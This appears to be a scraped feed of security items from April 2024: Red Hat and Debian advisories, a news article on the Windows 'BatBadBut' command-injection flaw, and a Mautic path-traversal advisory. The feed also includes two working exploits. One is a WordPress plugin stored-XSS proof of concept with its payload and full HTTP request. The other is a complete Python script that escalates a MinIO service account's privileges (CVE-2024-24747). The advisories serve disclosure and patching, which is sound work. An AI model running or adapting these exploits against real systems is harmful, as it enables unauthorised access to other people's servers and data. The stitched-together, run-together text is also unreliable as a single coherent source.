Red Hat Security Advisory 2024-1800-03 - Updates for bind and bind-dyndb-ldap are now available for Red Hat Enterprise Linux 9.0 Extended Update Support.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1800.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: bind and bind-dyndb-ldap security updates  
Advisory ID:        RHSA-2024:1800-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1800  
Issue date:         2024-04-15  
Revision:           03  
CVE Names:          CVE-2023-4408  
====================================================================

Summary: 

Updates for bind and bind-dyndb-ldap are now available for Red Hat Enterprise Linux 9.0 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.

Bind-dyndb-ldap provides an LDAP back-end plug-in for BIND. It features support for dynamic updates and internal caching, to lift the load off of your LDAP server.

Security Fix(es):

* bind9: Parsing large DNS messages may cause excessive CPU load (CVE-2023-4408)

* bind9: Querying RFC 1918 reverse zones may cause an assertion failure when \"nxdomain-redirect\" is enabled (CVE-2023-5517)

* bind9: Enabling both DNS64 and serve-stale may cause an assertion failure during recursive resolution (CVE-2023-5679)

* bind9: Specific recursive query patterns may lead to an out-of-memory condition (CVE-2023-6516)

* bind9: KeyTrap - Extreme CPU consumption in DNSSEC validator (CVE-2023-50387)

* bind9: Preparing an NSEC3 closest encloser proof can exhaust CPU resources (CVE-2023-50868)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-4408

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2263896  
https://bugzilla.redhat.com/show_bug.cgi?id=2263897  
https://bugzilla.redhat.com/show_bug.cgi?id=2263909  
https://bugzilla.redhat.com/show_bug.cgi?id=2263911  
https://bugzilla.redhat.com/show_bug.cgi?id=2263914  
https://bugzilla.redhat.com/show_bug.cgi?id=2263917

Red Hat Security Advisory 2024-1800-03

By Deeba Ahmed
Critical 'BatBadBut' Flaw in Windows Lets Hackers Inject Commands (Patch Now!)
This is a post from HackRead.com Read the original post: Windows Apps Vulnerable to Command Injection via “BatBadBut” Flaw

Flatt Security has discovered a critical vulnerability called “BatBadBut” that could allow attackers to inject malicious commands into Windows applications. The flaw, discovered by Flatt Security’s security engineer RyotaK, affects multiple programming languages. It was reported to the CERT Coordination Center and registered as CVE-2024-24576 on GitHub with a severity score of 10.0.

****What’s the Issue?****

Windows Rust developers are being urged to update their versions due to a critical vulnerability called ‘BatBadBut’, which could lead to malicious command injections on machines. The vulnerability affects the Rust standard library, which improperly escaped arguments when invoking batch files on Windows using the Command API.

BatBadBut vulnerability allows attackers to inject commands into Windows applications that rely on the ‘CreateProcess’ function. This is because cmd.exe, which executes batch files, has complex parsing rules and programming language runtimes fail to escape command arguments properly.

****Why it Occurs?****

The ‘BatBadBut’ issue occurs from the interaction between programming languages and the Windows operating system. When a program calls the “CreateProcess” function, Windows launches a separate process, “cmd.exe,” to handle the execution. This separate process parses the commands in the .bat file. 

For your information, Windows by default includes .bat and.cmd files in the PATHEXT environment variable, which can cause runtimes to execute batch files against developers’ intentions. An attacker can inject commands into Windows applications by controlling the command arguments section of batch files. To do this, the application must execute a command on Windows, specify the command file extension, control the command arguments, and fail to escape them.

“Some runtimes execute batch files against the developers’ intention if there is a batch file with the same name as the command that the developer intended to execute,” ” Ryotak explained.

****Impacted Applications****

Haskell process library, Rust, Node.js, PHP, and yt-dlp are affected by this bug. The Rust Security Response Working Group was notified on April 9 2024 that the Rust standard library, which is used to invoke batch files on Windows, is not properly escaping arguments, allowing attackers to execute arbitrary shell commands by bypassing the escaping. Haskell, Rust, and yt-dlp have issued patches.  

Ryotak reports that this isn’t an “internet breaking vulnerability” and most applications are not affected by it with several mitigations already available. Some programming languages have addressed it by adding an escaping mechanism. In addition, BatBadBut only affects Rust versions before 1.77.2, affecting no other platform or use.

****Mitigation Strategies:****

Researchers advise developers to exercise caution when using functions that interact with external processes, especially when dealing with user-supplied data. They recommend validating and sanitizing user input before incorporating it into commands, using safe alternatives, and staying updated with the latest security patches and fixes provided by framework and library developers.

1.  Rust-Based macOS Backdoor Linked to Ransomware Gangs
2.  Windows Defender SmartScreen Flaw Exploited with Malware
3.  Rust-Based Injector Deploys Remcos RAT in Multi-Stage Attack

Windows Apps Vulnerable to Command Injection via “BatBadBut” Flaw

### Impact
Prior to the patched version, logged in users of Mautic are vulnerable to Relative Path Traversal/Arbitrary File Deletion.  Regardless of the level of access the Mautic user had, they could delete files other than those in the media folders such as system files, libraries or other important files.

This vulnerability exists in the implementation of the GrapesJS builder in Mautic.

### Patches
Update to 4.4.12 or 5.0.4.

### Workarounds
No

### References
- https://cwe.mitre.org/data/definitions/23.html
- https://cwe.mitre.org/data/definitions/22.html
- https://attack.mitre.org/techniques/T1630/002/

### For more information

If you have any questions or comments about this advisory:

Email us at [security@mautic.org](mailto:security@mautic.org)

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2021-27916

**Mautic vulnerable to Relative Path Traversal / Arbitrary File Deletion due to GrapesJS builder**

High severity GitHub Reviewed Published Apr 11, 2024 in mautic/mautic • Updated Apr 12, 2024

**Package**

**Affected versions**

\>= 3.3.0, < 4.4.12

\>= 5.0.0-alpha, < 5.0.4

**Patched versions**

4.4.12

5.0.4

**Description**

Published to the GitHub Advisory Database

Apr 12, 2024

Last updated

Apr 12, 2024

GHSA-9fcx-cv56-w58p: Mautic vulnerable to Relative Path Traversal / Arbitrary File Deletion due to GrapesJS builder

Debian Linux Security Advisory 5656-1 - Security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5656-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonApril 11, 2024                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-3157 CVE-2024-3515 CVE-2024-3516Security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 123.0.6312.122-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmYYJcAACgkQZF0CR8NudjdhkRAAw6sMjh+3xY72+Q5DbvExle0J+9jEL9OALHhrVvWzGpUQjOx4sw64m03ZOV6G9W7/j5EqzMeSKrVFdRi+e/mANlBrXs4QfH1O+5cMD9fYUO/d6nPbFQJXwYOeU4GINkJOv690CQcIVAei1Udp6dmwL8pe4BAVTnDqWWgyxhBubBPM+RLVBu6/gKFa6Fm8fyOjcuwrwsdCVFNd2T9hICnQNLbh3DOFJ+6ElFCYDvcNbfdfYOXh/NIs3x8eImguEPsm8u4VmDAyg6JUZunUSiXFeVFqwmbiBDaloXjLsTRu2uBjeQcdMrU/FoZoKataksl5MZJmfsRspCIina4WOWkeL1tcg3texfCFVQ/XWreJKvFoyGOdBXcAVEcY+ePDmkahmQu3QyOB/QD4bxq76T2bwWylpB95S8f31Dr1SiJ3ru7NjKQsezxls3Ey1IWBia/qG4rYtmjwi/zcyTeejROSTXLBeCvOKFe7jPCw6iQ5fZb9eWtiBbJ2mIJBhSyrSzCKbfQjSRpV2JHPp5A7IksBcq8gtoL3L3ubhnaFsTvvtPeTQQK3pJvN+sZgnx/QMVSl2Kh/6HF28JqOPqGZWtSE+fcoQM0zubO41/LGOowNzvFK3rIa+iolu+iSykup40Xmr3sh+q8HSDKweX3znVFj+JFd9pk6DiTBwcKDjipTKlA==Cqgo-----END PGP SIGNATURE-----

Debian Security Advisory 5656-1

WordPress Playlist for Youtube plugin version 1.32 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Wordpress Plugin Playlist for Youtube - Stored Cross-Site Scripting (XSS)# Date: 22 March 2024# Exploit Author: Erdemstar# Vendor: https://wordpress.com/# Version: 1.32# Proof Of Concept:1. Click Add a new playlist and enter the XSS payload as below into the properties named "Name" or "Playlist ID".# PoC Video: https://www.youtube.com/watch?v=jrH5OHBoTns# Vulnerable Properties name: name, playlist_id# Payload: "><script>alert(document.cookie)</script># Request:POST /wp-admin/admin.php?page=playlists_yt_free HTTP/2Host: erdemstar.localCookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7C27abdae5aa28462227b32b474b90f0e01fa4751d5c543b281c2348b60f078d2f; wp-settings-time-4=1711124335; cld_2=like; _hjSessionUser_3568329=eyJpZCI6ImY4MWE3NjljLWViN2MtNWM5MS05MzEyLTQ4MGRlZTc4Njc5OSIsImNyZWF0ZWQiOjE3MTEzOTM1MjQ2NDYsImV4aXN0aW5nIjp0cnVlfQ==; wp-settings-time-1=1712096748; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26uploader%3D1%26Categories_tab%3Dpop%26urlbutton%3Dfile%26editor%3Dtinymce%26unfold%3D1; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7Cc64c696fd4114dba180dc6974e102cc02dc9ab8d37482e5c4e86c8e84a1f74f9Content-Length: 178Cache-Control: max-age=0Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "macOS"Upgrade-Insecure-Requests: 1Origin: https://erdemstar.localContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://erdemstar.local/wp-admin/admin.php?page=playlists_yt_freeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=0, i_wpnonce=17357e6139&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dplaylists_yt_free&name="><script>alert(document.cookie)</script>&playlist_id=123&template=1&text_size=123&text_color=%23000000

WordPress Playlist For Youtube 1.32 Cross Site Scripting

MinIO versions prior to 2024-01-31T20-20-33Z suffer from a privilege escalation vulnerability.

    # Exploit Title: MinIO < 2024-01-31T20-20-33Z -  Privilege Escalation# Date: 2024-04-11# Exploit Author: Jenson Zhao# Vendor Homepage: https://min.io/# Software Link: https://github.com/minio/minio/# Version: Up to (excluding) RELEASE.2024-01-31T20-20-33Z# Tested on: Windows 10# CVE : CVE-2024-24747# Required before execution: pip install minio,requestsimport argparseimport datetimeimport tracebackimport urllibfrom xml.dom.minidom import parseStringimport requestsimport jsonimport base64from minio.credentials import Credentialsfrom minio.signer import sign_v4_s3class CVE_2024_24747:    new_buckets = []    old_buckets = []    def __init__(self, host, port, console_port, accesskey, secretkey, verify=False):        self.bucket_names = ['pocpublic', 'pocprivate']        self.new_accesskey = 'miniocvepoc'        self.new_secretkey = 'MINIOcvePOC'        self.headers = {          'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36',          'Content-Type': 'application/json',          'Accept': '*/*'        }        self.accesskey = accesskey        self.secretkey = secretkey        self.verify = verify        if verify:            self.url = "https://" + host + ":" + port            self.console_url = "https://" + host + ":" + console_port        else:            self.url = "http://" + host + ":" + port            self.console_url = "http://" + host + ":" + console_port        self.credits = Credentials(            access_key=self.new_accesskey,            secret_key=self.new_secretkey        )        self.login()        try:            self.create_buckets()            self.create_accesskey()            self.old_buckets = self.console_ls()            self.console_exp()            self.new_buckets = self.console_ls()        except:            traceback.print_stack()        finally:            self.delete_accesskey()            self.delete_buckets()            if len(self.new_buckets) > len(self.old_buckets):                print("There is CVE-2024-24747 problem with the minio!")                print("Before the exploit, the buckets are : " + str(self.old_buckets))                print("After the exploit, the buckets are : " + str(self.new_buckets))            else:                print("There is no CVE-2024-24747 problem with the minio!")    def login(self):        url = self.url + "/api/v1/login"        payload = json.dumps({          "accessKey": self.accesskey,          "secretKey": self.secretkey        })        self.session = requests.session()        if self.verify:            self.session.verify = False        status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code        # print(status_code)        if status_code == 204:            status_code = 0        else:            print('Login failed! Please check if the input accesskey and secretkey are correct!')            exit(1)    def create_buckets(self):        url = self.url + "/api/v1/buckets"        for name in self.bucket_names:            payload = json.dumps({                "name": name,                "versioning": False,                "locking": False            })            status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code            # print(status_code)            if status_code == 200:                status_code = 0            else:                print("新建 (New)"+name+" bucket 失败 (fail)！")    def delete_buckets(self):        for name in self.bucket_names:            url = self.url + "/api/v1/buckets/" + name            status_code = self.session.request("DELETE", url, headers=self.headers).status_code            # print(status_code)            if status_code == 204:                status_code = 0            else:                print("删除 (delete)"+name+" bucket 失败 (fail)！")    def create_accesskey(self):        url = self.url + "/api/v1/service-account-credentials"        payload = json.dumps({            "policy": "{              \n    \"Version\":\"2012-10-17\",              \n    \"Statement\":[              \n        {              \n            \"Effect\":\"Allow\",              \n            \"Action\":[              \n                \"s3:*\"              \n            ],              \n            \"Resource\":[              \n                \"arn:aws:s3:::pocpublic\",              \n                \"arn:aws:s3:::pocpublic/*\"              \n            ]              \n        }              \n    ]              \n}",            "accessKey": self.new_accesskey,            "secretKey": self.new_secretkey        })        status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code        # print(status_code)        if status_code == 201:            # print("新建 (New)" + self.new_accesskey + " accessKey 成功 (success)！")            # print(self.new_secretkey)            status_code = 0        else:            print("新建 (New)" + self.new_accesskey + " accessKey 失败 (fail)！")    def delete_accesskey(self):        url = self.url + "/api/v1/service-accounts/" + base64.b64encode(self.new_accesskey.encode("utf-8")).decode('utf-8')        status_code = self.session.request("DELETE", url, headers=self.headers).status_code        # print(status_code)        if status_code == 204:            # print("删除" + self.new_accesskey + " accessKey成功！")            status_code = 0        else:            print("删除 (delete)" + self.new_accesskey + " accessKey 失败 (fail)！")    def headers_gen(self,url,sha256,method):        datetimes = datetime.datetime.utcnow()        datetime_str = datetimes.strftime('%Y%m%dT%H%M%SZ')        urls = urllib.parse.urlparse(url)        headers = {            'X-Amz-Content-Sha256': sha256,            'X-Amz-Date': datetime_str,            'Host': urls.netloc,        }        headers = sign_v4_s3(            method=method,            url=urls,            region='us-east-1',            headers=headers,            credentials=self.credits,            content_sha256=sha256,            date=datetimes,        )        return headers    def console_ls(self):        url = self.console_url + "/"        sha256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"        headers = self.headers_gen(url,sha256,'GET')        if self.verify:            response = requests.get(url,headers=headers,verify=False)        else:            response = requests.get(url, headers=headers)        DOMTree = parseString(response.text)        collection = DOMTree.documentElement        buckets = collection.getElementsByTagName("Bucket")        bucket_names = []        for bucket in buckets:            bucket_names.append(bucket.getElementsByTagName("Name")[0].childNodes[0].data)        # print('当前可查看的bucket有:\n' + str(bucket_names))        return bucket_names    def console_exp(self):        url = self.console_url + "/minio/admin/v3/update-service-account?accessKey=" + self.new_accesskey        sha256 = "0f87fd59dff29507f82e189d4f493206ea7f370d0ce97b9cc8c1b7a4e609ec95"        headers = self.headers_gen(url, sha256, 'POST')        hex_string = "e1fd1c29bed167d5cf4986d3f224db2994b4942291dbd443399f249b84c79d9f00b9e0c0c7eed623a8621dee64713a3c8c63e9966ab62fcd982336"        content = bytes.fromhex(hex_string)        if self.verify:            response = requests.post(url,headers=headers,data=content,verify=False)        else:            response = requests.post(url,headers=headers,data=content)        status_code = response.status_code        if status_code == 204:            # print("提升" + self.new_accesskey + " 权限成功！")            status_code = 0        else:            print("提升 (promote)" + self.new_accesskey + " 权限失败 (Permission failed)！")if __name__ == '__main__':    logo = """                            ____    ___   ____   _  _           ____   _  _    _____  _  _    _____   ___ __   __  ___        |___ \  / _ \ |___ \ | || |         |___ \ | || |  |___  || || |  |___  | / __|\ \ / / / _ \ _____   __) || | | |  __) || || |_  _____   __) || || |_    / / | || |_    / / | (__  \ V / |  __/|_____| / __/ | |_| | / __/ |__   _||_____| / __/ |__   _|  / /  |__   _|  / /   \___|  \_/   \___|       |_____| \___/ |_____|   |_|         |_____|   |_|   /_/      |_|   /_/                               """    print(logo)    parser = argparse.ArgumentParser()    parser.add_argument("-H", "--host", required=True, help="Host of the target. example: 127.0.0.1")    parser.add_argument("-a", "--accesskey", required=True, help="Minio AccessKey of the target. example: minioadmin")    parser.add_argument("-s", "--secretkey", required=True, help="Minio SecretKey of the target. example: minioadmin")    parser.add_argument("-c", "--console_port", required=True, help="Minio console port of the target. example: 9000")    parser.add_argument("-p", "--port", required=True, help="Minio port of the target. example: 9090")    parser.add_argument("--https", action='store_true', help="Is MinIO accessed through HTTPS.")    args = parser.parse_args()    CVE_2024_24747(args.host,args.port,args.console_port,args.accesskey,args.secretkey,args.https)

MinIO Privilege Escalation

Red Hat Security Advisory 2024-1795-03 - VolSync v0.9.1 general availability release images, which provide enhancements, security fixes, and updated container images.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1795.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: VolSync 0.9.1 security fixes and enhancements  
Advisory ID:        RHSA-2024:1795-03  
Product:            Red Hat ACM  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1795  
Issue date:         2024-04-12  
Revision:           03  
CVE Names:          CVE-2024-24786  
====================================================================

Summary: 

VolSync v0.9.1 general availability release images, which provide  
enhancements, security fixes, and updated container images.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE links in the References section.

Description:

VolSync is a Kubernetes operator that enables asynchronous replication of  
persistent volumes within a cluster, or across clusters. After deploying  
the VolSync operator, it can create and maintain copies of your persistent  
data.

For more information about VolSync, see:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.10/html/business_continuity/business-cont-overview#volsync

or the VolSync open source community website at:  
https://volsync.readthedocs.io/en/stable/.

This advisory contains enhancements and updates to the VolSync  
container images.

Security fix(es):  
* CVE-2024-24786 - golang-protobuf: encoding/protojson, internal/encoding/json: infinite loop in protojson.Unmarshal when unmarshaling certain forms of invalid JSON

Solution:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.10/html/business_continuity/business-cont-overview#volsync

CVEs:

CVE-2024-24786

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2268046  
https://issues.redhat.com/browse/ACM-10615

Red Hat Security Advisory 2024-1795-03

Red Hat Security Advisory 2024-1789-03 - An update for bind is now available for Red Hat Enterprise Linux 9.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1789.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: bind security update  
Advisory ID:        RHSA-2024:1789-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1789  
Issue date:         2024-04-11  
Revision:           03  
CVE Names:          CVE-2023-4408  
====================================================================

Summary: 

An update for bind is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.

Security Fix(es):

* bind: Preparing an NSEC3 closest encloser proof can exhaust CPU resources (CVE-2023-50868)

* bind: KeyTrap - Extreme CPU consumption in DNSSEC validator (CVE-2023-50387)

* bind: Specific recursive query patterns may lead to an out-of-memory condition (CVE-2023-6516)

* bind: Enabling both DNS64 and serve-stale may cause an assertion failure during recursive resolution (CVE-2023-5679)

* bind: Querying RFC 1918 reverse zones may cause an assertion failure when “nxdomain-redirect” is enabled (CVE-2023-5517)

* bind: Parsing large DNS messages may cause excessive CPU load (CVE-2023-4408)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-4408

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2263896  
https://bugzilla.redhat.com/show_bug.cgi?id=2263897  
https://bugzilla.redhat.com/show_bug.cgi?id=2263909  
https://bugzilla.redhat.com/show_bug.cgi?id=2263911  
https://bugzilla.redhat.com/show_bug.cgi?id=2263914  
https://bugzilla.redhat.com/show_bug.cgi?id=2263917

Red Hat Security Advisory 2024-1789-03

Red Hat Security Advisory 2024-1787-03 - An update for squid is now available for Red Hat Enterprise Linux 7. Issues addressed include buffer over-read, denial of service, and null pointer vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1787.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: squid security updateAdvisory ID:        RHSA-2024:1787-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1787Issue date:         2024-04-11Revision:           03CVE Names:          CVE-2023-46724====================================================================Summary: An update for squid is now available for Red Hat Enterprise Linux 7.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Squid is a high-performance proxy caching server for web clients, supporting FTP, Gopher, and HTTP data objects.Security Fix(es):* squid: denial of service in HTTP header parser (CVE-2024-25617)* squid: denial of service in HTTP request parsing (CVE-2023-50269)* squid: Buffer over-read in the HTTP Message processing feature (CVE-2023-49285)* squid: Incorrect Check of Function Return Value In Helper Process management (CVE-2023-49286)* squid: NULL pointer dereference in the gopher protocol code (CVE-2023-46728)* squid: Denial of Service in SSL Certificate validation (CVE-2023-46724)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-46724References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2247567https://bugzilla.redhat.com/show_bug.cgi?id=2248521https://bugzilla.redhat.com/show_bug.cgi?id=2252923https://bugzilla.redhat.com/show_bug.cgi?id=2252926https://bugzilla.redhat.com/show_bug.cgi?id=2254663https://bugzilla.redhat.com/show_bug.cgi?id=2264309

Red Hat Security Advisory 2024-1787-03

Red Hat Security Advisory 2024-1786-03 - An update for the httpd:2.4 module is now available for Red Hat Enterprise Linux 8. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1786.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: httpd:2.4/mod_http2 security updateAdvisory ID:        RHSA-2024:1786-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1786Issue date:         2024-04-11Revision:           03CVE Names:          CVE-2024-27316====================================================================Summary: An update for the httpd:2.4 module is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.Security Fix(es):* httpd: mod_http2: CONTINUATION frames DoS (CVE-2024-27316)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-27316References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2268277

Tag

#js